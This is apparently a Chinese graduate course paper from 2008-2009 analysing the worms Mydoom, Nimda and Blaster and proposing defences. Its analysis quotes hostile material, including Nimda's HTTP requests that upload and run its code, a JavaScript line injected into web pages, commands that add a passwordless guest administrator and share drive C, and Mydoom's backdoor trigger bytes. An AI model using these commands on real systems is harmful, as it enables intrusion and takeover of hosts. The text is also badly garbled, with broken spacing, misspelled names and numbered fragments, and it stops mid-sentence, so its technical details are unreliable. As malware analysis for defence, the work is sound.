蠕蟲病毒的特征與防治

1、蠕蟲病毒的特征與防治作者:日期:研究生課程論文（2 0 0 8-2 0 0 9學(xué)年第二學(xué)期）蠕蟲病毒的特征與防治摘要隨著網(wǎng)絡(luò)的發(fā)展，以網(wǎng)絡(luò)傳播的蠕蟲病毒利用網(wǎng)絡(luò)全球互聯(lián)的優(yōu)勢和計(jì)算 機(jī)系統(tǒng)及網(wǎng)絡(luò)系統(tǒng)安全性上的漏洞，己經(jīng)成為計(jì)算機(jī)系統(tǒng)安全的一大的威脅。采 用網(wǎng)絡(luò)傳播的蠕蟲病毒與傳統(tǒng)的計(jì)算機(jī)病毒在很多方面都有許多不同的新特點(diǎn)。 本文對(duì)蠕蟲病毒的特征和防御策略進(jìn)行了研究，透徹分析了幾個(gè)流行的蠕蟲病毒 的本質(zhì)特征和傳播手段，并提出了防治未知病毒以及變形病毒的解決方案與虛擬 機(jī)相結(jié)合的基于攻擊行為的著色判決PN機(jī)蠕蟲檢測方法。關(guān)鍵詞：蠕蟲，病毒特征，病毒防治?1引言“蠕蟲”這個(gè)生物學(xué)名詞于1982年由X

2、ero x PA RC的J ohn F. S hoeh等人最早引入計(jì)算機(jī)領(lǐng)域,并給出了計(jì)算機(jī)蠕蟲的兩個(gè)最基本的特征：“可以從一臺(tái)計(jì)算機(jī)移動(dòng)到另一臺(tái)計(jì)算機(jī)”和“可以自我復(fù)制”。最初，他們編寫蠕蟲 的目的是做分布式計(jì)算的模型試驗(yàn)。198 8年Mo rris蠕蟲爆發(fā)后,Euge ne H. Sp affo rd為了區(qū)分蠕蟲和病毒，給出了蠕蟲的技術(shù)角度的定義?！坝?jì)算機(jī)蠕蟲可 以獨(dú)立運(yùn)行，并能把自身的一個(gè)包含所有功能的版本傳播到另外的計(jì)算機(jī)上?！庇?jì)算機(jī)蠕蟲和計(jì)算機(jī)病毒都具有傳染性和復(fù)制功能，這兩個(gè)主要特性上的一致，導(dǎo)致二者之間是非常難區(qū)分的。近年來，越來越多的病毒采取了蠕蟲技術(shù)來達(dá)到其 在網(wǎng)絡(luò)上迅速感染

3、的目的。因而，“蠕蟲”本身只是“計(jì)算機(jī)病毒”利用的一種 技術(shù)手段02蠕蟲病毒的特征及傳播1、一般特征：(1)獨(dú)立個(gè)體，單獨(dú)運(yùn)行；(2 )大部分利用操作系統(tǒng)和應(yīng)用程序的漏洞主動(dòng)進(jìn)行攻擊；(3) 傳播方式多樣；(4) 造成網(wǎng)絡(luò)擁塞,消耗系統(tǒng)資源；(5) 制作技術(shù)與傳統(tǒng)的病毒不同，與黑客技術(shù)相結(jié)合。2、病毒與蠕蟲的區(qū)別(1) 存在形式上病毒寄生在某個(gè)文件上，而蠕蟲是作為獨(dú)立的個(gè)體而存在；(2) 傳染機(jī)制方面病毒利用宿主程序的運(yùn)行，而蠕蟲利用系統(tǒng)存在的漏洞；(3 )傳染目標(biāo)病毒針對(duì)本地文件，而蠕蟲針對(duì)網(wǎng)絡(luò)上的其他計(jì)算機(jī)；(4)防治病毒是將其從宿主文件中刪除，而防治蠕蟲是為系統(tǒng)打補(bǔ)丁。3、傳播過程:(1

4、) 掃描：由蠕蟲的掃描功能模塊負(fù)責(zé)探測存在漏洞的主機(jī)。(2) 攻擊：攻擊模塊按漏洞攻擊步驟自動(dòng)攻擊步驟 1中找到的對(duì)象，取得該主機(jī)的 權(quán)限(一般為管理員權(quán)限)，獲得一個(gè)shell。(3) 現(xiàn)場處理：進(jìn)入被感染的系統(tǒng)后，要做現(xiàn)場處理工作，現(xiàn)場處理部分工作主 要包括隱藏、信息搜集等等(4 )復(fù)制：復(fù)制模塊通過原主機(jī)和新主機(jī)的交互將蠕蟲程序復(fù)制到新主機(jī)并啟 動(dòng)。每一個(gè)具體的蠕蟲在實(shí)現(xiàn)這四個(gè)部分時(shí)會(huì)有不同的側(cè)重，有的部分實(shí)現(xiàn)的相 當(dāng)復(fù)雜,有的部分實(shí)現(xiàn)的則相當(dāng)簡略。尼姆達(dá)病毒是一個(gè)比較典型的病毒與蠕蟲 技術(shù)相結(jié)合的蠕蟲病毒，它幾乎包括目前所有流行病毒的傳播手段，并且可以攻 擊W in98 /N T/20

5、 0 0/X P等所有的W indows操作平臺(tái)。該病毒有以下4種 傳播方式：(1) 通過E mail發(fā)送在客戶端看不到的郵件附件程序 sample . e xe,該部分利 用了微軟的0E信件瀏覽器的漏洞；(2) 通過網(wǎng)絡(luò)共享的方式來傳染給局域網(wǎng)絡(luò)上的網(wǎng)絡(luò)鄰居，使用設(shè)置密碼的共享方式可以有效的防止該病毒的此種傳播方式；(3) 通過沒有補(bǔ)丁的II S服務(wù)器來傳播，該傳播往往是病毒屢殺不絕的原因，該方式利用了微軟I I S的U NICOD E漏洞；(4) 通過感染普通的文件來傳播，在這一點(diǎn)上和普通的病毒程序相同。4、蠕蟲病毒的傳播趨勢目前的流行病毒越來越表現(xiàn)出以下三種傳播趨勢 ：1、通過郵件附件傳

6、播病毒，如M ydoo m等郵件病毒;2、通過無口令或者弱口令共享傳播病毒,如Nim da、Net s key等；3、利用操作系統(tǒng)或者應(yīng)用系統(tǒng)漏洞傳播病毒，如沖擊波蠕蟲、震蕩波蠕蟲等。3目前流行的蠕蟲病毒3. 1 Myd o om郵件病毒Nov a rg/My d oom. a蠕蟲是2004年1月28日開始傳入我國的一個(gè)通過郵 件傳播的蠕蟲。在全球所造成的直接經(jīng)濟(jì)損失至少達(dá)400億美元，是2004年1月份十大病毒之首。該蠕蟲利用欺騙性的郵件主題和內(nèi)容來誘使用戶運(yùn)行郵件中 的附件。拒絕服務(wù)的方式是向網(wǎng)站的WEB服務(wù)發(fā)送大量G ET請(qǐng)求，在傳播和攻擊過程中，會(huì)占用大量系統(tǒng)資源，導(dǎo)致系統(tǒng)運(yùn)行變慢。蠕

7、蟲還會(huì)在系統(tǒng)上留下 后門,通過該后門，入侵者可以完全控制被感染的主機(jī)2。該蠕蟲沒有使用特別的技術(shù)和系統(tǒng)漏洞，之所以能造成如此大的危害，主要 還是由于人們防范意識(shí)的薄弱，和蠕蟲本身傳播速度較快的緣故。該蠕蟲主要通 過電子郵件進(jìn)行傳播，它的郵件主題、正文和所帶附件的文件名都是隨機(jī)的，另外 它還會(huì)利用K azaa的共享網(wǎng)絡(luò)來進(jìn)行傳播。病毒文件的圖標(biāo)和 win d ow s系統(tǒng)記 事本(NOTE P A D .EX E)圖標(biāo)非常相似，運(yùn)行后會(huì)打開記事本程序，顯示一些 亂碼信息，其實(shí)病毒已經(jīng)開始運(yùn)行了。病毒會(huì)創(chuàng)建名為“ Swe b Si pcS mt xS O”的排斥體來判斷系統(tǒng)是否己經(jīng)被感染。蠕蟲在系

8、統(tǒng)中尋找所有可能包含郵件地址的文件，包括地址簿文件、各種網(wǎng) 頁文件等，從中提取郵件地址，作為發(fā)送的目標(biāo)。病毒會(huì)避免包含以下信息的域 名：gov、mil、b o r 1 an、bs d、examp le等,病毒同樣會(huì)避免包含以下信息 的電子郵件帳戶:acco un、ca ce rtific、i c rosoft、inf o、linux 等，當(dāng)病毒檢測到郵件地址中含有上述域名或帳戶時(shí)則忽略該地址，不將其加入到發(fā)送地址鏈表中。Worm. Mydoom.a病毒主程序流程如圖3-1所示,后門程序s hi m gap i . d II如圖3 - 2所示：生 成 庫文 件創(chuàng)建無限循環(huán)掃描線程掃描wab文件、

9、IE臨時(shí)創(chuàng)建無限循環(huán)的發(fā)送郵 件 線 程圖3-1 Mydoom病毒主體流程圖r71F當(dāng)系統(tǒng)為Wni9X時(shí),查詢當(dāng)前線程信息，根據(jù)此信息獲得動(dòng)態(tài)庫路徑，修改注冊表鍵將創(chuàng)建后門端口并監(jiān)每半秒檢查一次注圖 3 -2 shi m gapi. d l 1流程圖M y doo m蠕蟲病毒除造成了網(wǎng)絡(luò)資源的浪費(fèi)，阻塞網(wǎng)絡(luò)，被攻擊網(wǎng)站不能提供正常服務(wù)外,最大的危險(xiǎn)在于安裝了后門程序。該后門即 shimgapi. dll，通 過修改注冊表，使自身隨著EX PL OR E R的啟動(dòng)而運(yùn)行，將自己加載到了資源 管理器的進(jìn)程空間中。后門監(jiān)聽31 27端口，如果該端口被占用，則遞增，但不 大于3 198。后門提供了兩個(gè)

10、功能：(1)作為端口轉(zhuǎn)發(fā)代理；(2 )作為后門，接收上傳程序并執(zhí)行。當(dāng)3 127端口收到連接之后,如果recv的第一個(gè)字符是x04,轉(zhuǎn)入端口轉(zhuǎn)發(fā) 流程。若第二個(gè)字符是0x01,則取3、4兩個(gè)字符作為目標(biāo)端口，取第5-8四個(gè)字節(jié)作為目標(biāo)IP地址,進(jìn)行連接并和當(dāng)前socket數(shù)據(jù)轉(zhuǎn)發(fā)。r ecv的第一個(gè)字符 如果是x85,則轉(zhuǎn)入執(zhí)行命令流程。先接收四個(gè)字節(jié)，轉(zhuǎn)成主機(jī)字節(jié)序后驗(yàn)證是否 是x133c9ea2,驗(yàn)證通過則創(chuàng)建臨時(shí)文件接收數(shù)據(jù)，接收完畢運(yùn)行該文件。也就是 說,只要我們把任意一個(gè)可執(zhí)行文件的頭部，加上五個(gè)字符:x8 5 133 c9ea 2,作 為數(shù)據(jù)發(fā)送到感染了 Mydoom.a蠕蟲機(jī)器的

11、312 7端口，這個(gè)文件，就會(huì)在系統(tǒng) 上被執(zhí)行,從而對(duì)被感染系統(tǒng)的安全造成了極大的威脅。Nimda蠕蟲病毒在Nim da蠕蟲病毒出現(xiàn)以前，“蠕蟲”技術(shù)一直是獨(dú)立發(fā)展的。Nmi d a病毒第一次將“蠕蟲”技術(shù)和“計(jì)算機(jī)病毒”技術(shù)結(jié)合起來。從Nim d a的攻擊方式來看，Nim da蠕蟲病毒只攻擊微軟的 Win X系列操作系統(tǒng)，它通過電子郵 件、網(wǎng)絡(luò)臨近共享文件、IE瀏覽器的內(nèi)嵌M I ME類型自動(dòng)執(zhí)行漏洞、II S服務(wù) 器文件目錄遍歷漏洞、C od e Red II和Sad mind/IIS蠕蟲留下的后門共五種 方式進(jìn)行傳播，其中前三種方式是病毒傳播方式。關(guān)于蠕蟲病毒的分析，在很多文獻(xiàn)中都有提到

12、，本文在這些文獻(xiàn)的基礎(chǔ)上，重點(diǎn)針對(duì)幾種典型的蠕蟲病毒在 技術(shù)實(shí)現(xiàn)上的特點(diǎn)進(jìn)行分析，以期找到他們的一些共性。1.被利用的系統(tǒng)漏洞描述(1 )微軟IE異常處理Ml ME頭漏洞IE在處理MIME頭中“C on tent 2Type: ”處指定的某些類型時(shí)存在問題, 攻擊者可以利用這類缺陷在IE客戶端執(zhí)行任意命令。(2 ) Microsof t IIS U n iCode解碼目錄遍歷漏洞微軟I IS 4.0和II S5. 0在U n i Cdoe字符解碼的實(shí)現(xiàn)中存在一個(gè)安全漏 洞，導(dǎo)致用戶可以遠(yuǎn)程通過IIS執(zhí)行任意命令。Mier o sof t IIS CGI文件名錯(cuò)誤解碼漏洞微軟IIS4.0 /5

13、.0在處理C GI程序文件名時(shí)存在一個(gè)安全漏洞,由于錯(cuò)誤 地對(duì)文件名進(jìn)行了兩次解碼，攻擊者可能利用這個(gè)漏洞執(zhí)行任意系統(tǒng)命令。(4 ) “Code Re d I I”和Sadmi nd/I I S蠕蟲留下的后門程序。2.傳播方式(1 )郵件傳播蠕蟲會(huì)向被攻擊者發(fā)送一封攜帶了蠕蟲附件的郵件。這個(gè)郵件由兩部分MIME類型的信息組成：第一部分的MI ME類型為“ tex t/h tm I”，但卻沒有包 含文本，因此看起來是空的；第二部分的MIME類型為“ aud io/x2 wa v” ,但它實(shí)際上攜帶的是一個(gè)名為“ Rea dme ex e”的bas e64編碼的可執(zhí)行附件。 利用了 “微軟IE異常

14、處理M IME頭漏洞”安全漏洞,任何運(yùn)行在x86平臺(tái)下并 且使用微軟IE 5 .5S P1或之前版本(IE5. 0 1SP 2除外)來顯示HTML郵件的 郵件客戶端軟件，都將自動(dòng)執(zhí)行郵件附件。用戶甚至只需打開或預(yù)覽郵件即可使蠕蟲被執(zhí)行4 。被蠕蟲攻擊的目標(biāo)郵件的地址從下列兩個(gè)來源中獲得： 用戶W eb C a che文件夾中的*.htm和*htm 1文件 用戶通過M API服務(wù)收到Email郵件的內(nèi)容蠕蟲在這些文件中搜索看起來像郵件地址的字符串，然后向這些地址發(fā)送一 份包含蠕蟲拷貝的郵件。N im da蠕蟲在W indows注冊表中記錄最后一批郵件發(fā) 送的時(shí)間，然后每十天重復(fù)搜索郵件地址并重新

15、發(fā)送蠕蟲郵件。(2)11 S WE E服務(wù)器傳播蠕蟲會(huì)利用兩個(gè)IIS服務(wù)器的目錄遍歷漏洞和以前的一些IIS蠕蟲(RdeCodeII和Sad mi nd/ I IS)留下的后門程序來進(jìn)行傳播。蠕蟲按照下列幾率來選擇攻擊目標(biāo)的IP地址： 5 0 %的幾率,在與本地IP地址前兩字節(jié)相同的地址(B類網(wǎng)絡(luò))中選擇一個(gè) 2 5%的幾率，在與本地IP地址前一字節(jié)相同的地址(A類網(wǎng)絡(luò))中選擇一 個(gè) 2 5 %勺幾率，隨機(jī)選擇IP地址。蠕蟲首先會(huì)啟動(dòng)一個(gè)T FTP服務(wù)器,監(jiān)聽U D P/6 9端口。在開啟TF T P服 務(wù)器和確定攻擊P1地址之后，Ni m da就開始對(duì)這個(gè)IP地址進(jìn)行掃描。首先，掃 描“ Rd

16、eC odell”留下的后門。由于被“ RedCodeI”攻擊過的系統(tǒng)中的 Web虛 擬目錄中會(huì)留下一個(gè)名為R oot.exe的后門程序，Nimda就首先掃描“ /Sc r ipt s /ro ot .exc”，如果這個(gè)程序存在的話，Nimda蠕蟲就企圖通過它在系統(tǒng)上執(zhí)行 命令。它執(zhí)行類似下列命令來向其發(fā)送蠕蟲代碼：GET/scripts/ro ot.ex e? /c+t H TTP/1.0其中Localip是本主機(jī)的IP地址，這樣就通過T F TP協(xié)議將本地的A dm in.d 1 l文件傳播過去，而這個(gè) Adm 1 n. dll實(shí)際上就是蠕蟲代碼本身，只不過它在* 這里是以*.dll文件的

17、形式存在。這樣做的目的，就像前面所講述的那樣是為了利 用I IS的系統(tǒng)文件列表權(quán)限提升漏洞來提升蠕蟲運(yùn)行的權(quán)限。在將Adm i n.dl1上傳到目標(biāo)主機(jī)上之后，蠕蟲就會(huì)通過發(fā)送：GET/scri pt s/Admin.dll HTTP /1. 0的請(qǐng)求來運(yùn)行蠕蟲。此時(shí)，蠕蟲是以系統(tǒng)管理員權(quán)限運(yùn)行的。其次,如果在掃描/Scrip t s/root.e x c時(shí)沒有成功，即目標(biāo)機(jī)中沒有“紅色 代碼I I”留下的后門程序，那么蠕蟲程序會(huì)繼續(xù)掃描目標(biāo)上的U n i co de漏洞以及二次解碼漏洞，以期通過這兩個(gè)漏洞在系統(tǒng)上執(zhí)行命令，如果發(fā)現(xiàn)其中某一個(gè)漏洞，蠕蟲就會(huì)重復(fù)利用/ s cr i p ts/r

18、o o t. exe所發(fā)送的T FTP命令來上傳 Admin . dll,然后運(yùn)行。A dmi n .d 1 l作為ISAP I程序運(yùn)行后,會(huì)把自身拷貝到 Windows系統(tǒng)文件夾命名M m c.exe，然后以帶參數(shù)方式運(yùn)行“ Mmc.ex e-qusery9bnow”。這樣就完成了通過IIS進(jìn)行傳播的過程。(3)文件共享傳播。蠕蟲訪問共享網(wǎng)絡(luò)資源，然后開始檢測遠(yuǎn)程系統(tǒng)上的文件。如果發(fā)現(xiàn)一個(gè)*.ex e文件，它將蠕蟲代碼加到原來文件的前面，下次執(zhí)行被感染文件時(shí)，將首先 執(zhí)行蠕蟲代碼。它并不感染 w in zi p 32 .ex e。如果發(fā)現(xiàn)*.doc文件，它將自己拷貝到*.doc文件所在目錄下

19、,改名為Riche d32.dl 1，并設(shè)置為隱藏、系統(tǒng)屬性。由于Microsoft word在打開該* .doc文件時(shí)，會(huì)首先在當(dāng)前目錄尋找 R i ched32.dl l，這將首先運(yùn)行蠕蟲代碼，這也會(huì)大 大增大遠(yuǎn)程用戶的感染幾率。它也會(huì)利用找到的文檔文件的名字創(chuàng)建以*.em 1和*nws后綴的文件，這些文件也是帶有蠕蟲拷貝的 MIME編碼的文件。(4)通過網(wǎng)頁進(jìn)行傳播。對(duì)于受感染的 WWW服務(wù)器,Nimda會(huì)修改其上的W WW網(wǎng)頁文件，使得瀏 覽該網(wǎng)站的用戶受其感染。當(dāng)蠕蟲通過Admin.d 1 l運(yùn)行時(shí)，蠕蟲生成的新程序(Mmc.exe)會(huì)在整個(gè)硬盤中搜索后綴為：H T M L, *AP

20、S HT M,文件 名為：Default, In dex,Ma i n ,Rc adme的文件。一旦發(fā)現(xiàn)了這樣的文件，蠕 蟲會(huì)在該目錄下創(chuàng)建一個(gè) Re adme. eml文件,它是一個(gè)由兩部分組成的 MIME 編碼的文件，里面也包含了蠕蟲拷貝。然后蠕蟲會(huì)在找到的文件的末尾增加如下Jav as crip t 代碼:“<t ml><sc r ipt la n guag e=”Javas c r ipt >w indow.open( ” readme.emilu“l(fā)l,“resab 1 e=no, t op =6000,1 e f t=6 0 0 0 ”)</s cri

21、p t ></h t ml>”這樣,其他用戶如果使用瀏覽器瀏覽被修改的網(wǎng)頁或者資源管理 (打開了預(yù) 覽功能)來瀏覽共享服務(wù)器上的Read me. me l文件時(shí)，利用IE瀏覽器異常處 理MI ME頭漏洞,蠕蟲就可以傳播到新的客戶端上。(5 )通過修改*.exe文件進(jìn)行傳播。前面幾種傳播方式都是通過網(wǎng)絡(luò)方式進(jìn)行的，也是Nimda最常用的傳染方式，它還會(huì)像普通的病毒那樣通過文件來進(jìn)行傳播。Ni m d a蠕蟲首先選擇感染* . exe文件，這樣當(dāng)通過軟盤或局域網(wǎng)進(jìn)行文件復(fù)制時(shí)，就會(huì)把蠕蟲程序傳播 到其它的機(jī)器上面。感染*.exe文件的具體做法是：先查找注冊表中H KE Y LO

22、C AL MACHINE'SOF TW A R E Mier o so ftWi nd C urr e n tVers io nAPPPathS鍵的內(nèi)容，這個(gè)鍵值存放了主機(jī)上的可執(zhí)行文件名字，一旦找到Ni mda就會(huì)以病毒的方式感染這些文件。把原來的* e xe文件作為資源存儲(chǔ)在新的*exe文件當(dāng)中，這樣當(dāng)運(yùn)行新 的*. e xe文件時(shí)首先執(zhí)行蠕蟲程序，然后再調(diào)用原來的* .ex e文件來執(zhí)行,這樣 對(duì)于用戶來說感覺上只是執(zhí)行了原來的*exe文件。還有一點(diǎn),Nim da如果發(fā) 現(xiàn)*.exe文件名為 W in zip32.ex e,則不進(jìn)行感染。這樣做可能是為了避免重要 程序Win Zi

23、p無法運(yùn)行導(dǎo)致系統(tǒng)崩潰。(6 )通過Word文檔進(jìn)行傳播。因?yàn)樾薷?. e xe文件容易被殺毒軟件檢測到，所以Nimda還通過替換 Wo r d 程序的一個(gè)動(dòng)態(tài)連接庫文件來達(dá)到傳播的目的。蠕蟲程序首先把自身復(fù)制到windows目錄中命名為Riched20.dll。然后它會(huì)搜索本地的共享目錄中包含 *.doc文件的目錄，一旦找到，就會(huì)把自身復(fù)制到目錄中并命名為R i ch ed20. dl l,并將文件屬性設(shè)置為隱藏和系統(tǒng)屬性。由于Micro s oft word在打開該*.doc文件時(shí)，會(huì)首先在當(dāng)前目錄尋找Rich ed20.dl l并加載，這樣就會(huì)運(yùn)行到蠕蟲代碼了。不僅如此蠕蟲還用找到的文檔

24、文件的名字加上.eml后綴來創(chuàng)建新文件，這些 文件也是帶有蠕蟲拷貝的M IM E編碼的文件。這樣做會(huì)使得系統(tǒng)中出現(xiàn)大量.em l文件。(7) 系統(tǒng)感染技術(shù)蠕蟲會(huì)檢查注冊表中的如下表項(xiàng)： HKEY L OCAL MA C HINESO FT WAREM i cro so ftWi ndowsCurren tVersi o nAPP Pa ths HK EY LO C AL MA C HINE'SOFTW A Microsoft'Win d Curr e ntVersionExp 1 orer'Sh el 1 Fo l d e r s然后感染所有找到的程序。蠕蟲會(huì)將自身拷貝

25、到w i ndwos Syste m目錄 中，命名為L o ad. ex e,并修改S ystem. i ni文件,將Sh e l 1部分改為如下內(nèi) 容：Shel 1= expl o rer.e xe load.exe - d o n t run old這樣每次系統(tǒng)重啟后都會(huì)運(yùn)行蠕蟲拷貝。它會(huì)用自身拷貝替換 Wi n d o w s 目錄下的R i ched20.d 1 l,這樣下次執(zhí)行w or d時(shí)會(huì)自動(dòng)執(zhí)行這個(gè)蠕蟲。如果蠕 蟲是以R eadme .exe文件名被執(zhí)行，它會(huì)將自身拷貝到W indows臨時(shí)目錄中， 并使用隨機(jī)文件名，例如tmp. ex e等。蠕蟲在第一次執(zhí)行時(shí)會(huì)尋找Exp 1

26、 orer進(jìn)程,將自己的進(jìn)程注冊為Exp lorer的一個(gè)遠(yuǎn)程線程。這樣即使用戶退出系統(tǒng), 蠕蟲仍然可以繼續(xù)執(zhí)行。(8) 后門安裝技術(shù)Nimd a蠕蟲通過修改一些注冊表項(xiàng)以降低系統(tǒng)安全性，同時(shí)也安裝系統(tǒng) 后 門。蠕蟲會(huì)將所有驅(qū)動(dòng)器設(shè)置成共享狀態(tài)，它會(huì)編輯如下注冊表項(xiàng)：HKEY_LOC A L _ M AC H I NES o ftwar e Mi e roso ftW i n do w s Cur r ent V e r s io n N e two r kL a nMan C$ ->Z$蠕蟲會(huì)刪除下列注冊表項(xiàng)的所有子鍵以禁止共享安全性：HKLMSYSTE M Curren t Cont

27、rol S e t S e r vice s l a nhares'Sec uri t y蠕蟲會(huì)修改下列注冊表項(xiàng)：HKLMS o ft w are M icrosof t Windo wsC ur r ent V ers i o nE x p Io rA dvan c e d調(diào)整Hi d de n,Showsu per Hidden和H i d e鍵值,使得使用資源管理器無 法顯示隱藏文件。這可以保護(hù)蠕蟲代碼，以免其被發(fā)現(xiàn)。通過執(zhí)行下列命令，蠕蟲還激活了Guest用戶，將其密碼設(shè)置為空，并將其加入到 A d mi ni s trato r s 組中(對(duì)于 Wi n dows NT/20

28、00/ X P 用戶):net use r g u est/ addnet user gu es/a ctiven et use r g u e stn e t local gro up Adminis t r a t o rs gues tnet local group Gu ests gues t/ a dd通過執(zhí)行下列命令，蠕蟲將設(shè)置為完全共享：net sha r e c$ = c： 3.3沖擊波病毒病毒的行為特征為閆：(1) 病毒運(yùn)行時(shí)會(huì)將自身復(fù)制為%sy s t em dir % msblast.exe,% sy s temd i r%是一個(gè)變量，它指的是操作系統(tǒng)安裝目錄中的系統(tǒng)目錄

29、，默認(rèn)是：“c： w i n dow s s yste m”或“ Wi nn tsyst em32'。(2) 病毒運(yùn)行時(shí)會(huì)在系統(tǒng)中建立一個(gè)名為：“E ILLY ”的互斥量,目的是病毒保證 在內(nèi)存中只有一份病毒體，避免用戶發(fā)現(xiàn)。(3) 病毒運(yùn)行時(shí)會(huì)在內(nèi)存中建立一個(gè)名為：“msblast. exe”的進(jìn)程，該進(jìn)程 就是活的病毒體。(4) 病毒會(huì)修改注冊表，在 HKE Y_ LO CA L_M A CHIN E SO FTWAR E Mi cro soft'Wi nd ow s Curre n tVersio nRu n 中添加鍵值：“w ind o ws auto update”

30、= “m sblast .exc” ,以便每次啟動(dòng)系統(tǒng)時(shí)，病毒都會(huì)運(yùn)行。(5 )病毒體內(nèi)隱藏有一段文本信息 ：I just w ant to say LOVE YO U SAN ! ! Billy gates why do you make t hi s possib 1 e? Sto p mak i ng money and you'e you r so ftware!(6) 病毒會(huì)以20秒為間隔，每2 0秒檢測一次網(wǎng)絡(luò)狀態(tài)，當(dāng)網(wǎng)絡(luò)可用時(shí)，病毒會(huì) 在本地的U D P/69端口上建立一個(gè)TF PT服務(wù)器，并啟動(dòng)一個(gè)攻擊傳播線程，不 斷的隨機(jī)生成攻擊地址，進(jìn)行攻擊,另外該病毒攻擊時(shí)，會(huì)首

31、先搜索子網(wǎng)的IP地 址,以便就近攻擊。(7) 當(dāng)病毒掃描到計(jì)算機(jī)后,就會(huì)向目標(biāo)計(jì)算機(jī)的TC P /135端口發(fā)送數(shù)據(jù)。(8) 當(dāng)病毒攻擊成功后，目標(biāo)計(jì)算機(jī)便會(huì)監(jiān)聽的TCP/4444端口作為后門,并綁定cmd .exe。然后蠕蟲會(huì)連接到這個(gè)端口 ,發(fā)送T F TP下載信息，目標(biāo)主機(jī)通 過TFTP下載病毒并運(yùn)行病毒。(9) 當(dāng)病毒攻擊失敗時(shí),可能會(huì)造成沒有打補(bǔ)丁的 Wind。邢系統(tǒng)RC P服務(wù)崩潰， Win dowXP系統(tǒng)可能會(huì)自動(dòng)重啟計(jì)算機(jī)。(10) 病毒檢測到當(dāng)前系統(tǒng)月份是8月之后或者日期是巧日之后，就會(huì)向微軟的更新站點(diǎn)“windowsupdate .com”發(fā)動(dòng)拒絕服務(wù)攻擊，使微軟網(wǎng)站的更新

32、站點(diǎn)無法為用戶提供服務(wù)。從上面沖擊波病毒的行為特征我們可以看出，沖擊波病毒與其他兩個(gè)病毒的 不同點(diǎn)在于其傳播方式。沖擊波病毒利用了 wi n dows系統(tǒng)的DCOM RPC緩沖 區(qū)漏洞攻擊系統(tǒng)，一旦攻擊成功，病毒體將會(huì)被傳送到對(duì)方計(jì)算機(jī)中進(jìn)行感染，不需要用戶的參與，而其他兩種是通過郵件附件的方式，引誘用戶點(diǎn)擊執(zhí)行。破壞性方面因病毒而異,病毒的執(zhí)行、自啟動(dòng)方面三種病毒都相似。Remo t e P roced u r e Ca ll(RPC)是運(yùn)用于 Windows操作系統(tǒng)上的一種協(xié)議。RPC提供相互 處理通信機(jī)制，允許運(yùn)行該程序的計(jì)算機(jī)在一個(gè)遠(yuǎn)程系統(tǒng)上執(zhí)行代碼。R PC協(xié)議本身源于OSF(ope

33、 n So ftware Foun dat ion) RPC協(xié)議，后來又另外增 加了一些Mi croso f t專用擴(kuò)展功能。RPC中處理TCP/IP信息交換的模塊由于 錯(cuò)誤的處理畸形信息，導(dǎo)致存在緩沖區(qū)溢出漏洞 ，遠(yuǎn)程攻擊者可利用此缺陷以本 地系統(tǒng)權(quán)限在系統(tǒng)上執(zhí)行任意指令，如安裝程序、查看或更改、刪除數(shù)據(jù)或建立 系統(tǒng)管理員權(quán)限的帳戶。據(jù)C ERT安全小組稱，操作系統(tǒng)中超過 50%的安全漏洞都是由內(nèi)存溢出 引起的,其中大多數(shù)與微軟技術(shù)有關(guān)，這些與內(nèi)存溢出相關(guān)的安全漏洞正在被越 來越多的蠕蟲病毒所利用。緩沖區(qū)溢出是指當(dāng)計(jì)算機(jī)程序向緩沖區(qū)內(nèi)填充的數(shù)據(jù) 位數(shù)超過緩沖區(qū)本身的容量時(shí)，溢出的數(shù)據(jù)就會(huì)覆蓋

34、在合法數(shù)據(jù)上，這些數(shù)據(jù)可 能是數(shù)值、下一條指令的指針，或者是其他程序的輸出內(nèi)容。一般情況下，覆蓋其他數(shù)據(jù)區(qū)的數(shù)據(jù)是沒有意義的，最多造成應(yīng)用程序錯(cuò)誤，但是如果輸入的數(shù)據(jù) 是經(jīng)過“黑客”或者病毒精心設(shè)計(jì)的，覆蓋緩沖區(qū)的數(shù)據(jù)恰恰是“黑客”或者病 毒的入侵程序代碼，一旦多余字節(jié)被編譯執(zhí)行，“黑客”或者病毒就有可能為所 欲為,獲取系統(tǒng)的控制權(quán)。溢出根源在于編程：緩沖區(qū)溢出是由編程錯(cuò)誤引起的。如果緩沖區(qū)被寫滿， 而程序沒有去檢查緩沖區(qū)邊界，也沒有停止接收數(shù)據(jù)，這時(shí)緩沖區(qū)溢出就會(huì)發(fā)生。 因此防止利用緩沖區(qū)溢出發(fā)起的攻擊，關(guān)鍵在于程序開發(fā)者在開發(fā)程序時(shí)仔細(xì)檢 查溢出情況，不允許數(shù)據(jù)溢出緩沖區(qū)。此外，用戶需要經(jīng)

35、常登錄操作系統(tǒng)和應(yīng)用 程序提供商的網(wǎng)站，跟蹤公布的系統(tǒng)漏洞，及時(shí)下載補(bǔ)丁程序，彌補(bǔ)系統(tǒng)漏洞。4蠕蟲病毒的防治蠕蟲病毒不同于一般的文件型病毒， 既表現(xiàn)出了強(qiáng)大的功能，也表現(xiàn)出了自 身的特點(diǎn)，變種多，功能相似，但當(dāng)前反病毒廠商仍然利用傳統(tǒng)的病毒特征串查 毒法進(jìn)行查毒。雖然隨著病毒庫的與日俱增，效率與日俱下，倒也還能滿足目前 的反病毒要求，但瓊斯病毒的出現(xiàn)，徹底宣判了單純特征串查毒法的死刑，迫切 需要一種新式高效的查毒方法來應(yīng)對(duì)瓊斯這類變形蠕蟲病毒。筆者總結(jié)了現(xiàn)有的 蠕蟲病毒非特征串檢測方法，并提出了自己的觀點(diǎn)。4. 1一般防治措施因?yàn)槟壳暗娜湎x病毒越來越表現(xiàn)出三種傳播趨勢 ：郵件附件、無口令或者弱

36、 口令共享、利用操作系統(tǒng)或者應(yīng)用系統(tǒng)漏洞來傳播病毒，所以防治蠕蟲也應(yīng)從這 三方面下手：(1) 針對(duì)通過郵件附件傳播的病毒：在郵件服務(wù)器上安裝殺毒軟件，對(duì)附件進(jìn)行殺 毒:在客戶端(主要是 ou tlook)限制訪問附件中的特定擴(kuò)展名的文件，如. pi f、.vbs、.js、.exe等;用戶不運(yùn)行可疑郵件攜帶的附件。(2) 針對(duì)弱口令共享傳播的病毒：嚴(yán)格來說，通過共享和弱口令傳播的蠕蟲大多也利用了系統(tǒng)漏洞。這類病毒會(huì)搜索網(wǎng)絡(luò)上的開放共享并復(fù)制病毒文件，更進(jìn)一步的蠕蟲還自帶了口令猜測的字典來破解薄弱用戶口令，尤其是薄弱管理員口令。對(duì)于此類病毒，在安全策略上需要增加口令的強(qiáng)度策略，保證必要的長度和復(fù)

